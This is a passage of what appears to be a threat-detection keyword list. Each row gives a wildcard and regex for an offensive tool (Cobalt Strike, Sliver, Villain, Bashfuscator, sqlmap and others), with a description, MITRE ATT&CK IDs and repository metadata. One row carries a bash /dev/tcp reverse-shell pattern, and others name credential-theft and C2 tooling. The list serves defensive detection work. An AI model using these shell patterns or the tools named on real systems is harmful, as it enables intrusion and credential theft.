"*BadUSB_HideWindow.ino*",".{0,1000}BadUSB_HideWindow\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_LockYourComputer.ino*",".{0,1000}BadUSB_LockYourComputer\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadZure-main*",".{0,1000}BadZure\-main.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*bananaKitten.exe*",".{0,1000}bananaKitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*BaRMIe*",".{0,1000}BaRMIe.{0,1000}","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","8","707","99","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z" "*baron-samedit-heap-based-overflow-sudo.txt*",".{0,1000}baron\-samedit\-heap\-based\-overflow\-sudo\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*base64_conversion_commands.ps1*",".{0,1000}base64_conversion_commands\.ps1.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*base64_conversion_commands.ps1*",".{0,1000}base64_conversion_commands\.ps1.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*bash ./bounce.sh*",".{0,1000}bash\s\.\/bounce\.sh.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*bash -i &>/dev/tcp/* <&1*",".{0,1000}bash\s\-i\s\&\>\/dev\/tcp\/.{0,1000}\s\<\&1.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*bash lse.sh*",".{0,1000}bash\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*bash_executor *",".{0,1000}bash_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*bash_read_line_reverse_tcp.py*",".{0,1000}bash_read_line_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*bashfuscator -*",".{0,1000}bashfuscator\s\-.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*Bashfuscator Team*",".{0,1000}Bashfuscator\sTeam.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*bashfuscator.py*",".{0,1000}bashfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*Bashfuscator-master*",".{0,1000}Bashfuscator\-master.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1504","175","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*bashRCPersistence*",".{0,1000}bashRCPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*BasicServiceExploit.class*",".{0,1000}BasicServiceExploit\.class.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*BastilleResearch*",".{0,1000}BastilleResearch.{0,1000}","offensive_tool_keyword","Github Username","Open source testing tools for the SDR & security community","T1179 - T1141 - T1142 - T1143","TA0011 - ","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--batch --dump -T *",".{0,1000}\-\-batch\s\-\-dump\s\-T\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*Bates.exe --kill*",".{0,1000}Bates\.exe\s\-\-kill.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*Bates.exe --listen*",".{0,1000}Bates\.exe\s\-\-listen.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*bats3c/ADCSPwn*",".{0,1000}bats3c\/ADCSPwn.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*bats3c/darkarmour*",".{0,1000}bats3c\/darkarmour.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*bats3c/DarkLoadLibrary*",".{0,1000}bats3c\/DarkLoadLibrary.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","10","990","199","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*bats3c/EvtMute*",".{0,1000}bats3c\/EvtMute.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*bawait_upload*",".{0,1000}bawait_upload.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bawait_upload_raw*",".{0,1000}bawait_upload_raw.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*bb141fb92bcd492552d5d6c09fbf39f7f674eb49*",".{0,1000}bb141fb92bcd492552d5d6c09fbf39f7f674eb49.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*bb205ccc783d22b06eac7ab9e5f2f14d793bf9b4ed6fe413f888463092ccf79a*",".{0,1000}bb205ccc783d22b06eac7ab9e5f2f14d793bf9b4ed6fe413f888463092ccf79a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*bb33277d1d07b2dc6438e1a95eb4446d1c7a975ec0e70bb8f4b09fe1160205cd*",".{0,1000}bb33277d1d07b2dc6438e1a95eb4446d1c7a975ec0e70bb8f4b09fe1160205cd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*bb3b1a1f-0447-42a6-955a-88681fb88499*",".{0,1000}bb3b1a1f\-0447\-42a6\-955a\-88681fb88499.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","32","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*bb62a3336da75791e241e3e757318dd0af03c1c678a249c3b67f16ef75ce648e*",".{0,1000}bb62a3336da75791e241e3e757318dd0af03c1c678a249c3b67f16ef75ce648e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bb695f5c847a67e8d0b6918a474b0f93090c8c5d64bf5b160b9f0c0fd4352bf5*",".{0,1000}bb695f5c847a67e8d0b6918a474b0f93090c8c5d64bf5b160b9f0c0fd4352bf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*bb774a70665afeafeda776cc7b37f59f29fc3b16124e94020a91d4fdfa3f260b*",".{0,1000}bb774a70665afeafeda776cc7b37f59f29fc3b16124e94020a91d4fdfa3f260b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*BB8A69C4-18B0-4FF2-989C-F70778FFBCE6*",".{0,1000}BB8A69C4\-18B0\-4FF2\-989C\-F70778FFBCE6.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*bb8a907ebbe611f271b35d461b15ccb8e90e36567e9963ea9a64ba4fe3d7d1bc*",".{0,1000}bb8a907ebbe611f271b35d461b15ccb8e90e36567e9963ea9a64ba4fe3d7d1bc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*bb94dc4cb2b8a99594a2199912c675406ae64d5e30141c4f3aa9109053a2790d*",".{0,1000}bb94dc4cb2b8a99594a2199912c675406ae64d5e30141c4f3aa9109053a2790d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bb95177747c3f54ff72dbcd2942c2278ee7567a1202c6d5c3183faeb78cf673c*",".{0,1000}bb95177747c3f54ff72dbcd2942c2278ee7567a1202c6d5c3183faeb78cf673c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bba2c964972ac62ae9f9a2e0ee0046fa046dff0cd53183ca2169e1659c234e98*",".{0,1000}bba2c964972ac62ae9f9a2e0ee0046fa046dff0cd53183ca2169e1659c234e98.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*bbb23c2b1443945e653b67353906939549ffac7dcdcf4bfd6a6c2f67a6320d13*",".{0,1000}bbb23c2b1443945e653b67353906939549ffac7dcdcf4bfd6a6c2f67a6320d13.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*BBCD0202-C086-437C-A606-015456F90C46*",".{0,1000}BBCD0202\-C086\-437C\-A606\-015456F90C46.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*bbfe2aee2092d981bd2822b8fde8db0ed264f0f86ed445d8987d99b505fd0ff5*",".{0,1000}bbfe2aee2092d981bd2822b8fde8db0ed264f0f86ed445d8987d99b505fd0ff5.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*bblockdlls*",".{0,1000}bblockdlls.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bbrowserpivot*",".{0,1000}bbrowserpivot.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bbrowserpivot*",".{0,1000}bbrowserpivot.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bbtfr/evil-proxy*",".{0,1000}bbtfr\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*bbypassuac*",".{0,1000}bbypassuac.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 